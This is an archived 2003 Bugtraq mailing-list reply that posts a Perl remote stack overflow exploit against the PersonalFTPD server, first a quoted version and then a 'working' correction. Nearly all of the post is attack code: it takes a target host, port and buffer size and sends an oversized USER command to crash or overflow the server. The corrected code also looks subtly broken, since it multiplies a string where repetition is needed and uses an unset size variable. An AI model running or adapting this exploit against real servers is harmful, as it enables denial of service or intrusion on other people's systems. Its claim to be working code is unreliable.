Re: Remote Stack Overflow exploit for Personal FTPD

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

In-Reply-To: <20030508081123.13047.qmail@www.securityfocus.com>

>Received: (qmail 20952 invoked from network); 8 May 2003 14:15:36 -0000
>Received: from outgoing2.securityfocus.com (205.206.231.26)
>  by mail.securityfocus.com with SMTP; 8 May 2003 14:15:36 -0000
>Received: from lists.securityfocus.com (lists.securityfocus.com 
[205.206.231.19])
>	by outgoing2.securityfocus.com (Postfix) with QMQP
>	id ED2648F2D9; Thu,  8 May 2003 08:19:59 -0600 (MDT)
>Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@securityfocus.com>
>List-Help: <mailto:bugtraq-help@securityfocus.com>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
>List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
>Delivered-To: mailing list bugtraq@securityfocus.com
>Delivered-To: moderator for bugtraq@securityfocus.com
>Received: (qmail 22205 invoked from network); 8 May 2003 07:49:14 -0000
>Date: 8 May 2003 08:11:23 -0000
>Message-ID: <20030508081123.13047.qmail@www.securityfocus.com>
>Content-Type: text/plain
>Content-Disposition: inline
>Content-Transfer-Encoding: binary
>MIME-Version: 1.0
>X-Mailer: MIME-tools 5.411 (Entity 5.404)
>From: subj <r2subj3ct@dwclan.org>
>To: bugtraq@securityfocus.com
>Subject: Remote Stack Overflow exploit for Personal FTPD
>
>
>
>#!/usr/bin/perl
>use IO::Socket;
>
>##########################################################
>#                                                        #
># Remote Stack Overflow sploit for PersonalFTPD          #
># If wanna talk with me find me on irc                   #
># irc.irochka.net #dwc, #global, #phreack                #
># ###################################################### #
># thanx to kabuto, drG4njubas, fnq                       #
># gr33tz to dhg, gipshack, rsteam, blacktigerz           #
># D4rkGr3y, r4ShRaY, DethSpirit, J0k3r, Foster, nik0     #
># ORB, Moby, 3APA3A, euronymous, L0vCh1Y, d1z            #
># ###################################################### #
># Vulnerability links:                                   #
># http://security.nnov.ru/search/document.asp?docid=4309 #
># http://www.securityfocus.com/archive/1/316958          #
>#                                                        #
>##########################################################
>
>$data = "A";
>
>print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n";
>print "[..] Remote Stack Overflow sploit for PersonalFTPD [..]\n";
>print "[..]      by subj | dwc :: big 10x to Kabuto       [..]\n";
>print "[..]    www.dwcgr0up.com www.dwcgr0up.com/subj/    [..]\n";
>print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n\n";
>
>$count_param=@ARGV;
>$n="0";
>if ($count_param==0) {print "Usage: -h - host, -p - port, -b - buffer 
>size\n\n"; exit; }
>while ($n<$count_param) {
>if ($ARGV[$n] eq "-h") {$server=$ARGV[$n+1];}
>if ($ARGV[$n] eq "-p") {$port=$ARGV[$n+1];}
>if ($ARGV[$n] eq "-b") {$buf=$ARGV[$n+1];}
>$n++;
>}
>&connect;
>
>sub connect 
>{
>$sock = IO::Socket::INET->new(PeerAddr => "$server", PeerPort 
=> "$port", 
>Proto => "tcp")
>        || die "Can\'t connect to $server port $port\n";
>print $sock "USER $buffer\n";
>print "Buffer has beens sended...";
>
>}
>
>
>close($sock);
>exit;
>
--------------------------------------------------------------------------
I bring the apologies, has laid out not working version, simply was 
mistaken a file, before $sock it is necessary to add $buffer. = $data * 
$bsize;
Working code


#!/usr/bin/perl
use IO::Socket;

##########################################################
#                                                        #
# Remote Stack Overflow sploit for PersonalFTPD          #
# If wanna talk with me find me on irc                   #
# irc.irochka.net #dwc, #global, #phreack                #
# ###################################################### #
# thanx to kabuto, drG4njubas, fnq                       #
# gr33tz to dhg, gipshack, rsteam, blacktigerz           #
# D4rkGr3y, r4ShRaY, DethSpirit, J0k3r, Foster, nik0     #
# ORB, Moby, 3APA3A, euronymous, L0vCh1Y, d1z            #
# ###################################################### #
# Vulnerability links:                                   #
# http://security.nnov.ru/search/document.asp?docid=4309 #
# http://www.securityfocus.com/archive/1/316958          #
#                                                        #
##########################################################

$data = "A";

print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n";
print "[..] Remote Stack Overflow sploit for PersonalFTPD [..]\n";
print "[..]      by subj | dwc :: big 10x to Kabuto       [..]\n";
print "[..]    www.dwcgr0up.com www.dwcgr0up.com/subj/    [..]\n";
print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n\n";

$count_param=@ARGV;
$n="0";
if ($count_param==0) {print "Usage: -h - host, -p - port, -b - buffer 
size\n\n"; exit; }
while ($n<$count_param) {
if ($ARGV[$n] eq "-h") {$server=$ARGV[$n+1];}
if ($ARGV[$n] eq "-p") {$port=$ARGV[$n+1];}
if ($ARGV[$n] eq "-b") {$buf=$ARGV[$n+1];}
$n++;
}
&connect;

sub connect 
{
$buffer.= $data * $bsize;
$sock = IO::Socket::INET->new(PeerAddr => "$server", PeerPort => "$port", 
Proto => "tcp")
        || die "Can\'t connect to $server port $port\n";
print $sock "USER $buffer\n";
print "Buffer has beens sended...";

}


close($sock);
exit;
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux